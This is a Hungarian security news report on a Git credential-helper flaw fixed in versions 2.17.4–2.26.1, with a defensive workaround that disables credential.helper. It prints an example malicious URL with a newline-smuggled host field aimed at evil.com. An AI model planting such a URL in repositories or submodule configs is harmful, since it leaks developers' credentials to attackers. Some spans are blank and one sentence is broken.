Az elosztott forrásvezérlő rendszer Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 és 2.17.4 korrekciós kiadásai amely megszüntette () a kezelőben "", ami miatt a hitelesítési adatok rossz gazdagépnek kerülnek elküldésre, amikor egy git-kliens egy újsor karaktert tartalmazó, speciálisan formázott URL-címmel fér hozzá egy adattárhoz. A sérülékenység segítségével gondoskodhat arról, hogy egy másik gazdagép hitelesítő adatait a támadó által vezérelt szerverre küldjék.
Amikor olyan URL-címet ad meg, mint például a „https://evil.com?%0ahost=github.com/”, a hitelesítési adatok kezelője az evil.com gazdagéphez való csatlakozáskor átadja a github.com számára megadott hitelesítési paramétereket. A probléma olyan műveletek végrehajtásakor jelentkezik, mint például a „git klón”, beleértve az almodulok URL-címeinek feldolgozását (például a „git submodule update” automatikusan feldolgozza a .gitmodules fájlban megadott URL-címeket a tárhelyből). A sérülékenység azokban a helyzetekben a legveszélyesebb, amikor egy fejlesztő klónoz egy adattárat anélkül, hogy látná az URL-t, például amikor almodulokkal dolgozik, vagy olyan rendszerekben, amelyek automatikus műveleteket hajtanak végre, például a csomagépítési szkriptekben.
Az új verziók sebezhetőségeinek blokkolása újsor karakter átadása a hitelesítő adatcsere protokollon keresztül továbbított értékekben. A disztribúciók esetében nyomon követheti a csomagfrissítések megjelenését az oldalakon , , , , , , .
Megkerülő megoldásként a probléma blokkolására Ne használja a credential.helper fájlt nyilvános lerakatokhoz való hozzáféréskor, és ne használja a „git clone”-t „--recurse-submodules” módban ellenőrizetlen tárolókkal. A credential.helper kezelő teljes letiltása, ami igen és jelszavak lekérése innen , védett vagy egy jelszavas fájlt, használhatja a következő parancsokat:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Forrás: opennet.ru